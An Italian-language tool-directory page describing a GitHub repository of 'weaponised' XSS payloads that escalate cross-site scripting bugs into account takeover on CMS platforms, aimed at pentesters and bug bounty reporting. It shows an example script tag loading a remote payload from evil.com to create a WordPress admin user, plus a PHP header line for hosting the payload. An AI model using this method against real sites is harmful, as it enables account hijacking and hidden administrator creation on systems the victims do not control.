Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
weaponised-XSS-payloads — XSS payloads designed to turn alert(1) into P1 | Kitploit
Strumenti/GitHubGitHub/hakluke/weaponised-xss-payloads
Payload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubhakluke/weaponised-xss-payloads

weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1

Vedi Repository
1.4k2222 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Payload XSS armati

Payload XSS progettati per trasformare alert(1) in P1.

Il Post del Blog

Questa repo è stata rilasciata insieme a un post del blog intitolato "Come Elevare i Tuoi Bug XSS da Medium a Critical" https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

Cos'è questo?

In questo repository troverai una serie di file JavaScript che possono essere caricati in un payload XSS per eseguire funzioni sensibili su piattaforme CMS popolari nel contesto del browser della vittima. Questo può aiutare a concatenare un comune bug XSS in qualcosa di più critico, come il furto dell'account.

Questo è perfetto per aumentare la gravità di un pentest o di un report di bug bounty dimostrando un reale impatto sulla sicurezza.

I payload vengono aggiunti lentamente, man mano che ho tempo. Ce ne sono molti altri in arrivo; se puoi dare una mano, le pull request sono benvenute! Se stai cercando ispirazione su cosa creare, controlla la scheda "issues" di questa repo.

Come Fare

Il modo più semplice per usare questi payload è ospitarli da qualche parte e caricarli nell'attributo src di un tag script per il tuo payload XSS, in questo modo:

root@kitploit:~
<script src="http://evil.com/wordpress_create_admin_user.js"></script>

In alternativa, a seconda del contesto e della lunghezza del payload, a volte può essere minificato, codificato e poi incluso direttamente nella richiesta.

Per ospitare il file JavaScript, potresti dover impostare il Content-Type su application/javascript. Per farlo con PHP, puoi semplicemente anteporre questa riga a uno qualsiasi dei payload, salvarlo come file .php e ospitarlo sul tuo server web con PHP abilitato:

root@kitploit:~
<?php header("Content-Type: application/javascript"); ?>

Crediti

Questo articolo di Shift8 è ciò che mi ha ispirato a creare questa repo. Il JS nell'articolo ha un paio di refusi minori, ma i concetti sono azzeccati.

Scarica lo strumento